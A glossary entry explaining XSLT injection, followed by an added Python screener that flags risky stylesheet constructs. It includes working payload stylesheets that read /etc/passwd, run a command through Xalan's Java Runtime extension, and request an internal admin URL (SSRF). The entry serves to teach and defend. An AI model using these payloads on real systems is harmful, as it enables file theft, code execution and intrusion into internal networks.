Security Glossary

XSLT Injection

A vulnerability where malicious content injected into XSLT stylesheets can lead to file disclosure, SSRF, or code execution through extension functions.

XSLT Injection is a vulnerability where attackers can inject malicious content into XSLT (Extensible Stylesheet Language Transformations) stylesheets, potentially leading to information disclosure, server-side request forgery, or remote code execution.

How It Works

XSLT transforms XML documents using stylesheet rules. When user input influences XSLT processing or stylesheet content, attackers can inject XSLT elements that access the filesystem, make network requests, or execute code through extension functions.

Information Disclosure

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="/">
    <!-- Read local file -->
    <xsl:value-of select="document('/etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>

Code Execution (Java)

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
                version="1.0">
  <xsl:template match="/">
    <xsl:variable name="rtobject" select="rt:getRuntime()"/>
    <xsl:variable name="process" select="rt:exec($rtobject,'whoami')"/>
  </xsl:template>
</xsl:stylesheet>

SSRF via XSLT

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="/">
    <xsl:value-of select="document('http://internal-server/admin')"/>
  </xsl:template>
</xsl:stylesheet>

Vulnerable Contexts

  • PDF generators using XML/XSLT
  • Document conversion services
  • XML-based reporting systems
  • Content management systems
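
In any of these contexts, a stylesheet that arrives from outside can be screened before it reaches the processor. The following is an added example, not part of the original glossary entry, that flags the constructs used in the three stylesheets above; the function name, the finding labels and the namespace allowlist are assumptions.

```python
import io
import re
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
# Assumption: the only namespaces an uploaded stylesheet may declare are XSLT
# itself and the XHTML output vocabulary. Anything else may bind a prefix to a
# processor extension, as the xalan/java namespace above does.
ALLOWED_NS = {XSL_NS, "http://www.w3.org/1999/xhtml"}
# Functions that make the processor fetch another resource by URI.
FETCH_CALL = re.compile(r"\b(?:document|unparsed-text)\s*\(")
# Elements that load further stylesheets by URI.
LOADERS = {f"{{{XSL_NS}}}import", f"{{{XSL_NS}}}include"}


def screen_stylesheet(text):
    """Return sorted findings for an untrusted stylesheet; [] means nothing flagged."""
    if "<!DOCTYPE" in text:
        return ["dtd-declared"]  # rejected unparsed: no entity handling needed
    findings = set()
    try:
        source = io.BytesIO(text.encode("utf-8"))
        for event, item in ET.iterparse(source, events=("start-ns", "start")):
            if event == "start-ns":
                _prefix, uri = item
                if uri not in ALLOWED_NS:
                    findings.add(f"disallowed-namespace:{uri}")
            else:
                if item.tag in LOADERS:
                    findings.add("external-stylesheet")
                # Scans every attribute, so attribute value templates are covered too.
                if any(FETCH_CALL.search(v) for v in item.attrib.values()):
                    findings.add("resource-fetch-function")
    except ET.ParseError:
        return ["not-well-formed"]
    return sorted(findings)


# Constructed sample: the file-read stylesheet shown above.
SAMPLE = """<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="/">
    <xsl:value-of select="document('/etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>"""

if __name__ == "__main__":
    print(screen_stylesheet(SAMPLE))
```

A screen like this complements, and does not replace, disabling extension functions and external resource access in the XSLT processor itself.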
